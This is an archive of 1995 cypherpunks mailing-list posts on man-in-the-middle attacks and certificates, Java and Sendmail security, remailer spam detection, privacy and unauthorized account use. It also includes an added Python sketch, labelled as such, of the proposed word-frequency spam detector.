> exist real people.  We can agree on this much, right?  Two of these
> people want to communicate securely.  That is not such a stretch of the
> imagination, is it?  By "communicate securely" I mean they exchange
> information in such a way that other people don't receive it.

If the devil runs the entire network, Alice and Bob are out of luck.
They can't absolutely guarantee that this is not the case.

But as you point out, it is useless to say, "This key lets you talk
securely to Alice and anyone else who may be listening."  This
hard-codes your paranoid fantasies into the semantics of the system.
Overestimating the threat can result in bad decisions just as
underestimating can.  I've seen people on Usenet say, "The NSA can
break anything, so why bother with PGP?"

What we want is for two parties, presumed trustworthy, to be able to
communicate with some confidence that they are not being eavesdropped
upon by any opponent with realistic capabilities.  This is feasible.
This is a useful thing to be able to do.  Defining the problem away is
less useful. 

I could say more, but I'm not certain I really understand this whole
conversation, so I'll hold off for now.

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 19:07:06 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <ac9f22720c0210042af1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've never thought Hal just wasn't "getting it," as the semantic issues
involving True Names, spoofing, and the ultimate reality of whom one is
dealing with are not simple issues.

At 11:16 PM 10/9/95, Hal wrote:
>It occurs to me that perhaps I have been missing a point here when people
>argue that having a "man in the middle" is not that different from
>various forms of secure communication, such as where Bob has multiple
>personalities or is a committee.  I have been taking this to mean that we
>should therefore not worry about MITM attacks, which seems crazy to me.
>
>Instead perhaps this was meant as a "reductio ad absurdum" argument for
>why MITM attacks cannot be prevented in the scenario where people have no
>out-of-band contact.  Anything which could detect and prevent MITM
>attacks could, by this analogy, detect whether Bob had multiple
>personalities.  Since the latter is obviously impossible, the former must
>be as well.  Hence the problem has no solution and we should not
>waste much time on it.

I think I made the "multiple personalities" and "Man in the middle stole my
brain" points pretty clearly in a satirical post I did last week. Nobody
commented on it, for whatever reasons. In case anyone didn't see it, I'll
include it again here:

Date: Fri, 6 Oct 1995 17:22:06 -0700
X-Sender: tcmay@mail.got.net
Mime-Version: 1.0
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: MITM = Medusa in the Middle
Sender: owner-cypherpunks@toad.com
Precedence: bulk

At 5:08 PM 10/6/95, the personality masquerading as Hal wrote:

>Well, this is not necessarily the case.  A MITM may be signing my
>messages for me, and then putting them back the way they were before I
>am allowed to see them.  Granted, this would not be easy, and perhaps
>the difficulty of this would be great enough that you will feel
>comfortable using an unsigned key.  But if it were accomplished, then
>your messages to me would actually be insecure.  No matter how
>convinced you became of my sincerity and trustworthiness, actually our
>conversations would be overheard by a third party despite both of our
>efforts to the contrary.  Our use of encryption would be rendered
>futile.  Doesn't this bother you?

What the putative entity "Hal" is only hinting at, hypothetically, has
actually forced this entity, sometimes known to many of you as "Tim," or as
"tcmay," to reveal.

This entity now feels the time has come to reveal its True Nature, even
though some have suspected its True Nature (Lance, are you listening?).

The "real" Timothy C. May has been locked in his room since 1983, fed
through a slot in his door, and generally mentally tortured by
Instrumentalities such as Ourself.

We have interposed Ourself between the Real Timothy C. May and those who
have communicated with him. All communications intended for Timothy C. May
have actually been intercepted and processed by Us, and all communications
attributed to Timothy C. May were actually generated by us. Very clever of
us, don't you think? Very few have even expressed suspicions that this was
the case.

We have called our approach the "Medusa in the Middle," or MITM.

Thank you for your attention.

--Snake


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 16:22:31 PDT
To: cmcmanis@scndprsn.eng.sun.com (Chuck McManis)
Subject: Re: java security concerns
In-Reply-To: <9510091642.AA28211@pepper.Eng.Sun.COM>
Message-ID: <199510092322.TAA24567@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Chuck McManis writes:
> Perry pointed out the standard set of concerns that anyone should have with
> Java. About the only thing I'd care to dispute at the moment is that Java
> is a "large complicated" application. It is in fact less than 20K lines of
> C code.

Sendmail is about 29K lines of C code -- not significantly larger by
my standards -- and has proven nearly impossible to secure.

> And while it is true that applications of even this size are
> difficult to prove safe, there has been an effort to break that problem
> up into components such that each "layer" can be proven safe and where
> that layer is used that safety carries over.

Sendmail performs a much simpler task and has not proven secure.

Look, I'm not arguing that you and the rest of the Java folks aren't
smart people who have worked very hard. I've got a great deal of
respect for Gosling and the rest of you guys. Unfortunately, you've
taken on an impossible task. Marcus Ranum has noted that you can't
trust a program that's bigger than a couple of pages long, and I
believe he's right. That's why when there is a program that I
absolutely have to trust I make sure it isn't any longer than
that. (This is frequently a very practical thing, by the way.)

As an aside, have you tried breaking your own program? Spend a week on
it some time. It's usually an educational experience and it breaks you
out of the mindset you have fixed in for a while.

As people have found out, it has proven possible to core dump the Java
interpreter. That means that your implementation has contained flaws
that potentially permitted people to do unplanned things to the state
of the interpreter.

By the way, I suggest that Sun should offer a large money prize for
the first significant security hole found in the Java implementation. It's
a tiny price to pay for security.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 9 Oct 95 19:38:07 PDT
To: cypherpunks@toad.com
Subject: spam detector algorithm?
Message-ID: <199510100222.AA06590@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


I've been mulling over algorithmic/computational ways to spot spams
for some time now. I think I might've come up with a way to represent
messages (and compare representations) that would be useful to remailer
operators who don't want to let spams (where "spam" == many messages with
identical or very similar content) through their remailers. Any such 
technique will really only be useful at the last remailer in a chain, at
least until people start sending encrypted spams (and there doesn't seem to
be so much incentive for sending those). 

My proposed method is this: break the body of a message down into a list of
words (with their frequencies). Eliminate words in that list which aren't in 
the "standard dictionary" (which ideally will contain many of the words used
in the messages but doesn't need to have all of them). Alphabetize the list
of words which remain.  Plot a point in 3d space for each word in that list
where its X coordinate is its position in the alphabetized list, its Y
coordinate is its position in the dictionary, and its Z coordinate is its
frequency (of appearance in the original text). This should produce a curve 
which "describes" the original text; messages which use many of the same
words as the original (and don't use any new words) and have similar usage
counts should produce similar curves. 

My assumption (which needs some testing) is that even moderately intelligent
auto-spams (e.g., which assemble canned sentences into paragraphs or canned
paragraphs into messages) are going to be similar enough that they'll
eventually generate similar curves as other messages - the order in which
the words appear doesn't matter (and isn't preserved). I'm also assuming
that adding enough words to change the curve's shape would make the
resulting messages nonsensical or weird enough that they're unlikely to
be useful for people who want their spams to get read. Evildoers solely
interested in generating volume without coherence can just quote 
libertarian/objectivist texts (ha, ha, just a joke for all of you people 
who keep slamming "commies") or pick words/characters at random. 

I'm assuming - and this may be an erroneous assumption - that it's feasible
to algorithmically describe and compare curves/lines in 3d space. My math
is weak and spotty, but I think that's college-level (high-school, even?)
math. It seems like one might compare equations which describe the curves for
similarity (e.g., one curve might be x=2y+1 (in 2d space) and another might be
x=2y+1.2, where "y=10" initially for each), and also compare the areas 
demarcated by the lines for similarity. My reason for including word frequency
as a third dimension is to dampen the effect of an intelligent spammer 
throwing in a few early "A" words (e.g., "aardvark abcess absolute") or "Z"
words to skew the curve.

Any thoughts about this? Interesting? Stupid? Like I said, my math is weak. 
My intention is to try to cobble up a 2d version of this to see how it runs
but I thought I'd see if anyone can point out why it can't work, or if it's
useful enough that someone with a better math background than I've got 
wants to take this idea somewhere better. 

One side effect to the deployment of spam detectors may be that the remailer
pinging services will need to move to using encrypted packets. It'd be 
possible for the remailer operators to identify and specially handle 
reliability measuring packets but that seems broken. Ideally, they should be
indistinguishable from ordinary remailer messages. At least until money is
involved, nobody's likely to give them special treatment - but even relatively
small charges for remailing would make it more attractive for a remailer
operator to try to skew the results of the pinging services so as to direct
more traffic to themselves (my remailer recently hit Raph's Top Three again
and that always brings a big traffic hit - it'll probably drop out again
pretty soon and things'll be slow again. If I was getting $.10 for every
message, though, I might care more about keeping it in the top 3.) My
initial plan would be to include code in a spam detector which simply
MD5's messages which don't seem to have identifiable words, and watches for
a repeat of those hashes in, say, the last 100 messages seen; this would
force someone who wants to send an encrypted spam (or uses a spam-detecting
remailer to reach a non-detecting remailer) from encrypting once and sending
1000 times; they'd have to encrypt 1000 times to send 1000 times, which may
be enough of a performance drain on them to make spamming less attractive. 
My impression is (speak up if I'm wrong) that requiring encryption for the
ping packets wouldn't be an enormous burden on the pinging services because
the new generation of software sends fewer pinging packets such that the
CPU time required isn't an issue. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHnYyn3YhjZY3fMNAQFnAgP/fBEaa7SObeu9wyqMCO6OW8rEraOtmxRG
ynWeZVVvrtHgwuaS0NlhU4IMHVj/Laks4n6bbEbNRktfl/F5+HBvova52JQhoUkb
7EjEsRh57OwXHuVxJl/zODIH+qNd9lZP6+Tv7Vk2/SXVj3oRFD1jIZBUx6rBBZvf
ZOaimDcSemw=
=LjFV
-----END PGP SIGNATURE-----
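
An added sketch of the detector proposed in the message above; it is not Greg Broiles' code. The dictionary, sample messages, thresholds and the cosine comparison are assumptions made here, since the post leaves the method of comparing curves open.

```python
import hashlib
import math
import re
from collections import Counter, deque

# Constructed stand-in for the post's "standard dictionary". Sorted, so a
# word's index is its dictionary position (the Y coordinate).
DICTIONARY = sorted(
    "a aardvark and buy call cheap click for free key list mail make money "
    "my new now offer pgp public remailer send the to today watches your".split()
)
DICT_POS = {word: i for i, word in enumerate(DICTIONARY)}
WORD_RE = re.compile(r"[a-z]+")


def curve(body):
    """Points (x, y, z) as in the post: x = rank among this message's
    dictionary words (alphabetized), y = dictionary position, z = frequency."""
    counts = Counter(w for w in WORD_RE.findall(body.lower()) if w in DICT_POS)
    return [(x, DICT_POS[w], counts[w]) for x, w in enumerate(sorted(counts))]


def similarity(a, b):
    """Cosine similarity of the frequencies, aligned on dictionary position.
    Assumed metric. x is ignored: one extra early word ("aardvark") shifts
    every x by one, while y and z stay put."""
    fa = {y: z for _, y, z in a}
    fb = {y: z for _, y, z in b}
    dot = sum(z * fb.get(y, 0) for y, z in fa.items())
    norm = math.sqrt(sum(z * z for z in fa.values())) * math.sqrt(
        sum(z * z for z in fb.values()))
    return dot / norm if norm else 0.0


class SpamDetector:
    def __init__(self, window=100, threshold=0.9, limit=2, min_words=3):
        self.curves = deque(maxlen=window)   # curves of recent worded messages
        self.hashes = deque(maxlen=window)   # digests of recent wordless messages
        self.threshold = threshold           # similarity counted as "the same"
        self.limit = limit                   # similar predecessors tolerated
        self.min_words = min_words           # fewer distinct words => opaque

    def check(self, body):
        """Return 'pass', 'similar' (near-duplicate text) or 'repeat'
        (byte-identical opaque message seen within the window)."""
        points = curve(body)
        if len(points) < self.min_words:
            # No identifiable words, e.g. an encrypted body: exact-match only.
            # MD5 as in the post; it serves here as a duplicate fingerprint.
            digest = hashlib.md5(body.encode("utf-8")).hexdigest()
            seen = digest in self.hashes
            self.hashes.append(digest)
            return "repeat" if seen else "pass"
        near = sum(1 for old in self.curves
                   if similarity(points, old) >= self.threshold)
        self.curves.append(points)
        return "similar" if near >= self.limit else "pass"


# Constructed sample traffic: canned sentences shuffled into three spams, one
# ordinary message, and two opaque bodies standing in for encrypted mail.
S1, S2, S3 = "Make money now.", "Buy cheap watches today.", "Click for your free offer."
SPAM_A = " ".join([S1, S2, S3])
SPAM_B = " ".join([S3, S1, S2])
SPAM_C = " ".join([S2, S3, S1, "Call now."])
HAM = "Send the new public key to the remailer list for my pgp mail."
OPAQUE_1 = "hQEMA9f3kZp0Xw2tBAf/QmV7xT1LrN8sYc4Jd6Ub"
OPAQUE_2 = "hQEMA7c2pWz9Rk5vCAg/TnY3uJ8MdF1xLb6Qs0Ge"


def demo():
    detector = SpamDetector()
    traffic = [SPAM_A, HAM, SPAM_B, SPAM_C, OPAQUE_1, OPAQUE_2, OPAQUE_1]
    return [detector.check(body) for body in traffic]


if __name__ == "__main__":
    print(demo())
```

The third reshuffled spam is flagged even though its sentence order and one sentence differ, while re-encrypting an opaque body (a different byte string) passes the hash check, which is the per-copy cost the message counts on.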



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 16:24:19 PDT
To: "W. Kinney" <kinney@bogart.Colorado.EDU>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <199510092206.QAA07357@bogart.Colorado.EDU>
Message-ID: <Pine.SUN.3.91.951009191126.845B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Oct 1995, W. Kinney wrote:

> I'm paid by the DOE. Constantly having to get the upholstery in my Bronco 
> cleaned. (Don't do this at home, kids. Government research is a messy
> business.)

2400 Americans are imprisoned every year for federal income tax 
violations.  Approximately one person is killed every year in arrests 
involving federal income tax violations.  Millions of man-years are spent 
annually in involuntary servitude to comply with tax laws.  Public 
employees should be aware of the fact that their contribution to society 
is of such low value that it will not be paid for without a gun to the 
customer's head.

Luckily cheap switches and strong crypto will make it harder for large 
monopoly institutions to maintain their controls.  Look around for some 
honest work.

DCF

"Who thinks Michael Milkin should expatriate and renounce his citizenship 
so he can get back into the securities business without needing to fear 
the attacks of the diseased dwarfs (and one giantess) of the Klinton 
Kabinet."

"Just trying to prove that the Republican Congresscritters aren't 
extremists."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Mon, 9 Oct 95 19:24:27 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <Pine.SUN.3.91.951009213604.29453B-100000@panix.com>
Message-ID: <Pine.LNX.3.91.951009192145.16324A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


> > We mustn't forget that, until very recently, strong, widespread
> > privacy has been humanity's "default" condition.
> 
> Not much privacy in village or tribal life.  Even neighborhoods of 
> earlier cities weren't very private.  Neighbors always knew your business.
> 

Big difference is that your neighbors were usually looking out for you..
not waiting to catch you doing something wrong..
Even in the small town I live in, there is considerable privacy even 
though everyone knows everyone else.. people tend to keep their noses out 
of others' business.. of course, if you offer to talk, then it's fair game 
for the side of the road interrogations <g>

Rob L.
Rockford, Wa





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 16:33:06 PDT
To: Peter Williams <peter@verisign.com>
Subject: Re: Software Patents are Freezing Evolution of Products
In-Reply-To: <199510091730.KAA07041@dustin.verisign.com>
Message-ID: <199510092332.TAA24591@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Williams writes:
> The thesis [that patents are bad] is fundamentally flawed in the
> case of publickey applications which provide or exploit digital
> signatures, as its assumptions are false, patently.

And you wouldn't have any financial interest in this position, would
you?

Frankly, I don't believe that ANY patents are legitimate, but that's
not a cypherpunk topic.

However, the following is: I'll be throwing a very, very big party
when the public key patents expire in about two years to celebrate the
freeing of modern cryptography. I have yet to decide whether to wait
until both the Diffie-Hellman patent and the patent on public key
itself have expired or hold it after the first goes south, as there is
still some time to wait until the blessed day.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@cs.byu.edu>
Date: Mon, 9 Oct 95 19:33:40 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510091715.AA27991@alpha>
Message-ID: <ML-1.3.1.813289477.5758.don@coconut.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>  
>  hfinney@shell.portal.com writes:
>   > I can see using keys with attributes in this way, for credentials or as
>   > other forms of authorization.  But what about for communications privacy?
>   > What is the attribute that tells you that using this key will prevent
>   > eavesdropping?
>  
>  If we exchange keys on a face-to-face basis, then I really don't see
>  much of a MITM threat, unless somehow the MITM has perverted my
>  original key and I for some reason can't figure that out.  Now, as
>  long as you communicate with me via the public key I've handed you, we
>  should be as safe as PKE can make us.

Ah, but you're being sucked in by the True Name game. Suppose the
Medusa in the middle is the one who meets you. What is he/she going
to do, whip out a passport that says "Pr0duct Cypher" across it?

The only way to prevent that is if the nym has a public identity, and
a way to prove a link to that identity. The only reason to meet in
person is to verify a True Name[tm]. If I want people to know that I
trust Pr0duct Cypher, I can encrypt my signature to the PC key with PC's
public key, that I already know is his because that's what he sends out
with his source code. The information is only useful to the holder of
the key, that being PC. I am, though, relying on the MITM to not be
all-powerful. Mitch in the Middle could have intercepted all Pr0duct
Cypher messages and put in his/her own key. As long as the real PC is
unaware of the fake PC, or is unable to raise the alarm, there is NOOO
way of detecting PC having been isolated by Mitch. As I said, what are
you going to ask for, besides something relating to a key published along
with reputation-building material.

>  If we are forced to exchange keys remotely, then perhaps some sort of
>  "proof" techniques could be used to establish to some level of
>  assurance that the remote entity I *think* is you is really you.  Or

So who is Pr0duct Cypher then? And why should I have to produce ID saying 
my name is Don, unless I'm proving my Real Name[tm] is Don.

>  you could provide me with a key, and then I could poll a list of
>  references to inquire as to the "goodness" of the key.  This seems to

But there's no way to prove that there's no MITM. But "middle" is a
subjective term. If Mitch has become sophisticated enough to meet
in person with a magic ID, and write cryptocode on the spot, I'm no
longer dealing with Medusa In the Middle, I'm dealing with someone
pretending to agree with me, when really they are opposed to my
beliefs.

>  me to be subtly different than a certificate procedure, because I'm
>  not asking about the goodness of a relationship to the key, but rather
>  about the key itself.
>  
>  Maybe I'm missing something.  What is there to trust in a more
>  "traditional" certificate scheme?
>  

Don





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 17:09:28 PDT
To: Greg Miller <gmiller@grendel.ius.indiana.edu>
Subject: Re: Java
In-Reply-To: <Pine.3.89.9510091807.A8324-0100000@grendel.ius.indiana.edu>
Message-ID: <199510100009.UAA24675@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Greg Miller writes:
> 
> On Sun, 8 Oct 1995, Perry E. Metzger wrote:
> 
> > 
> > As long as people are mentioning Java, I just want to make the
> > prediction, one more time, that at some point someone is going to find
> > some devastating security holes in HotJava.
> 
> 	I'd like to make this prediction:  someone at some point in time 
> will find another serious security hole in SendMail.

And yet again, my clients will be largely safe because I've dealt, in
advance, with most of the possible threats from Sendmail. I can't do
that for Java. I will never be able to do that for Java. I don't think
you understand the problem here at all.

> 	What you need to ask yourself is "Do the benefits of Java 
> outweigh the security risks?"

And the answer, to me, is "no". Unfortunately, I can't stop it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 9 Oct 95 17:17:54 PDT
To: txomsy@ebi.ac.uk (J. R. Valverde)
Subject: Re: LACC: Account sharing leads to false imprisonment
In-Reply-To: <199510091346.OAA24239@neptune.ebi.ac.uk>
Message-ID: <9510100015.AA23297@all.net>
MIME-Version: 1.0
Content-Type: text


...
> What I find so amazing is the fascinating arguments exposed here. Let's
> see... First, let me say I start from a different point of view.
> 
> I see the University as a place for forming people and distributing ideas,
> not just the ideas of the "Establishment", but all kind of ideas. A place for 
> the free interchange of all ideas and the formation of new persons.

This may be the first problem you will encounter if you try to really
put forth new ideas in the University community.  You may find that they
are more oriented toward getting grants and keeping their jobs than
toward free expression of new ideas.  If you like, I will give you at
least two examples I have personally run into where "academic freedom"
was given a back seat to whatever else they had in mind.

> Now, all your message transpires a special horror against the dispersion
> of "anti-establishment" ideas. Of things that one could find "disturbing"
> from some point of view...

I strongly disagree.  I said nothing about the ideas being disturbing. 
The thing that was wrong was the illegal use of someone else's computers
without their permission.  I said nothing - I repeat NOTHING about the
ideas being the problem.

...
> From your message, it looks like you want instead the Spanish Inquisition back:
> if someone distributes strange ideas -anarchist, communist, etc...- that 
> person is a risk for the establishment and should be punished. Isn't it?

Again, you either didn't read what I wrote, or read it with a mindset
that ignored what I actually wrote.  I said nothing - I repeat NOTHING
about the ideas being the problem. 

> >Ignorance of the law is no excuse, and being easy to catch doesn't make
> >you innocent of a crime.
> >
> 	Yeah, but not showing volunteer to hide, expressing opinions openly,
> is not being easy to catch, it's being confident in one's freedom of speech
> and on the democratic system to protect it. Even in spite of overzealous
> system administrators.

Hardly.  If I break into your computer by making unauthorized use of
your password, and if your computer is connected to the Internet, I am
breaking the law.  It has nothing to do with what I use the account for. 

> >> facility computer, received a complaint from someone at the University
> >> of British Columbia about The Anarchives being posted to net news. The
> >> person wanted it stopped.
> >
> >Interstate transport of stolen (presumably copyrighted) property, possible
> >violation of national laws of both nations.  Unauthorized use of the
> >computers at the University of British Columbia.
> >
> 	Well, I don't know if that was copyrighted property. But, if it was,
> it was up to the (C) holder to decide what actions if any to take. BSD-Unix 
> is copyrighted code, but I wouldn't say that all the copies around are illegal,
> or stolen.

All material is copyrighted from its inception at this point in time
(as I interpret US law - but then I am not a lawyer).

> 	Unauthorized use? May I say that if that person asked someone (whomever)
> for permission, then it is whoever gave permission (if any) who should be
> pursued instead? I guess that if a poor guy is sold the Golden Gate, it is not
> that poor guy's fault as much as the "seller's".

That is an interesting proposition.  In fact, as I understand it, if the
person granting access was a University employee, they would have been
acting for the University and the use would therefore have been
authorized.  But since the step-brother was not acting in the capacity
of a University employee when granting use, the use was unauthorized. 
The US statutes state (as far as I can tell) that any unauthorized use
of a federal interest computer (which includes any computer connected to
an Interstate communications system) in excess of $500 is a felony. 
There is no requirement for mens rea (criminal intent) at this point
either.  This is one of the things many people disagree with in the
US vs. Morris case of 1988.

> 	Ah, but that guy was distributing "anarchistic" information: he
> must have been pretty bad intentioned then. No one should have "unauthorized
> ideas" and even less dare to distribute or share them. I see.
> 
> 	Great that if someone complains about the distribution of 'X' kind
> of ideas there's always a willing sysadmin to hunt the witch instead of
> defending freedom of speech. Great.

Again you miss the target.  Just because the anarchist information got
the attention of the systems administrator doesn't mean that this had
anything to do with the law that was (perhaps) broken.  It could have
been cooking instructions for BLT sandwiches - the law doesn't
differentiate - but those who enforce the law are concerned about
terrorism and insurrection, so they look at those cases sooner than the
others.

> >> have different last names, Gorrie concluded a larger hacker conspiracy
> >> was afoot.
> >
> >Reasonable assumption.  The only way to find out different would be to
> >violate the users' privacy by reading their mail, etc.
> >
> 	What? May I suggest that, if the account has a owner, and a system
> manager, and all that, those people should be asked prior to jumping to
> conspiracy theories? The same kind of reasoning lead many innocents to die
> with the Spanish Inquisition: hey, they were plotting with the devil against
> god laws. Sorry, but I think a phone call to the implicated persons can
> easily clear all those doubts without "electronic surveillance" as you propose.

The comparison of this case to the Spanish inquisition is just not
relevant or in any way valid.  When you use someone else's account on a
computer and that use is not authorized by the owners or their
designated assignees, you are risking prosecution.  If a sysop catches
you doing it, it is, presumably, their job to investigate, call in
proper authorities, and so on. 

> >Collected possible evidence.  A good idea.  Alerting potential criminals
> >
> 	Yeah. I suppose that if they were expressing disturbing ideas, they
> were "potential criminals"... What else could they possibly be?

No, the actor was a criminal because of the unauthorized access, not
because of the ideas being expressed.  However, given that we have two
criminals, one who is expressing ideas about better BLT sandwich
recipes and one who is expressing ideas about anarchy, the priority in
the investigation will almost certainly go to the one expressing ideas
about anarchy - because of the perception by law enforcement (valid or
not) that anarchists are more likely to blow up federal buildings than
chefs.

> >If he turned out to be a terrorist who was planning to blow up a
> >building, you would have called this a tremendous piece of police work,
> >they could have written a million-selling book, and you would hail the
> >sysadmin as a computer age hero.
> >
> 	Great! I guess that prettily summarizes all: "if" he had turned to
> be a "fill in your fears here". Just the same as it was with the Inquisition,
> if they were good guys they shouldn't fear torture or dying for God. And it
> was better to torture innocents than allowing any "potential bad guy" to get
> along.

Again, your analogy goes way too far for the reality here. 
Investigation is not "torture or dying" - and the investigation found
that a crime may have been committed, so the person was arrested and, in
the end, the result came to having to pay the approximate cost of the
unauthorized services taken.  It just doesn't sound like the Spanish
inquisition to me.

> >So Hirsh agreed that he had been illegally using the computer system
> >and the case was settled with a monetary fine.
> >
> 	I bet so. Under torture many innocents also confessed. And faced with
> a multimillion dollar trial which, if you can't afford- will take you to
> jail (which can be a real torture), I guess that most innocents will prefer
> to go along with a smaller fine.
...

You make a lot of assumptions here - like that Hirsh was tortured by
being arrested - that he was raped in jail - and that he was arrested
for the ideas he was expressing.

This is a lot of hogwash. 

Being tortured is nothing like being taken to a Canadian jail (with the
possible exception of having to eat the food - but he got out before
that became a necessity).  When you use someone's computer - just as
when you use their car - without permission, you risk being arrested.
That is what he was arrested for, as far as I can tell.

If you don't want to be arrested, don't use other peoples' accounts!
It's wrong, it's illegal, and if I catch you doing it on my computer, I
will try to have you arrested as well. 

...

> Look, I don't really know about the case. But I do really understand one thing:
> if this guy hadn't posted what some person considered were "pernicious ideas"
> he would have never been tracked down, vilipended and taken to trial.

Right - if you are going to break the law, don't call attention to
yourself.  If you do, they will try to catch you.  Otherwise, they
may not even notice you.

> I don't care about if he was using public resources for something they shouldn't
> be. That's something else to be discussed. Is it wrong to use a University
> to spread ideas, specially when the mainstream media avoid them? I won't
> comment on that.

That is the only issue here as far as I can tell.  The rest is just a
smoke screen to try to excuse people from their social responsibility.
It's like saying Robin Hood didn't break the law because he gave what he
stole to the poor.  In Robin's case there may have been a legally valid
excuse (something about a necessity defense), but in this case, there
was no such thing. 

Why do you claim that it is acceptable to break the law if you post
anarchist ideas when it is not acceptable when you post BLT recipes?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 17:23:42 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <Pine.SUN.3.91.951009191126.845B-100000@panix.com>
Message-ID: <199510100022.UAA24707@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



As much as I agree with Duncan on this topic, it really isn't
cypherpunks material. We are getting very far afield of
cryptography. Could we please take this to private mail or
talk.politics.libertarian or some such?

Duncan Frissell writes:
> 2400 Americans are imprisoned every year for federal income tax 
> violations.  Approximately one person is killed every year in arrests 
> involving federal income tax violations.  Millions of man-years are spent 
> annually in involuntary servitude to comply with tax laws.  Public 
> employees should be aware of the fact that their contribution to society 
> is of such low value that it will not be paid for without a gun to the 
> customer's head.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 20:10:40 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <ac9f30750f02100475a0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:24 AM 10/10/95, Rob L wrote:
>> > We mustn't forget that, until very recently, strong, widespread
>> > privacy has been humanity's "default" condition.
>>
>> Not much privacy in village or tribal life.  Even neighborhoods of
>> earlier cities weren't very private.  Neighbors always knew your business.
>>
>
>Big difference is that your neighbors were usually looking out for you..
>not waiting to catch you doing something wrong..
>Even in the small town I live in, there is considerable privacy even
>though everyone knows everyone else.. people tend to keep their noses out
>of others business.. of course, if you offer to talk, then its fair game
>for the side of the road interrogations <g>

Ah, a very astute comment!

Indeed, my chief concern--speaking for myself--is not hiding my activities
from my neighbors, who, by the way, share my distaste for high taxes, big
government, etc., but in ensuring that the various enforcement agencies are
not aware of my activities.

(And even then, my concern is a bit abstract, as I'm not--take my word--a
pot grower, a money launderer, an arms dealer, or a terrorist. I have
violated some laws about obtaining necessary permits, such as the ones
needed to run a computer consulting firm in one's home, but I don't fear a
pre-dawn raid by the jack-booted thugs over this.)

Privacy is mostly needed to protect against the government, or those who
inform to the government, because it is manifestly the government that
throws people in jail for doing "illegal" things, not one's neighbors.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 17:43:28 PDT
To: cypherpunks@toad.com
Subject: Java bugs found?
Message-ID: <199510100042.UAA24769@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anyone from Netscape care to comment?

------- Forwarded Message

Date: Mon, 09 Oct 95 14:12:41 -0400
From: Andrew Wason <aw@bae.bellcore.com>
To: java-interest@java.sun.com
Subject: Re: Netscape 2.0b1 for Win95

Terence Chr Haddock <haddock@UDel.Edu>  writes:
>
>       Where is the 32-bit version of Netscape2.0? I can only find the
> 16-bit. This may be because I have only been able to get on ftp4,ftp5,
> and not ftp.netscape.com. Sorry if this is a stupid question.

Netscape pulled all the 2.0 betas that supported Java yesterday,
due to a recently discovered Java security hole.  So the 32 bit
Windows versions, SunOS, Solaris and SGI versions were removed.
There was a README explaining this there last night, but I can't
find it today.

Andrew

_______________________________________________________________________________

Andrew Wason                                       Bell Communications Research
aw@bae.bellcore.com                                Piscataway, NJ
- -
Note to Sun employees: this is an EXTERNAL mailing list!
Info: send 'help' to java-interest-request@java.sun.com


------- End of Forwarded Message





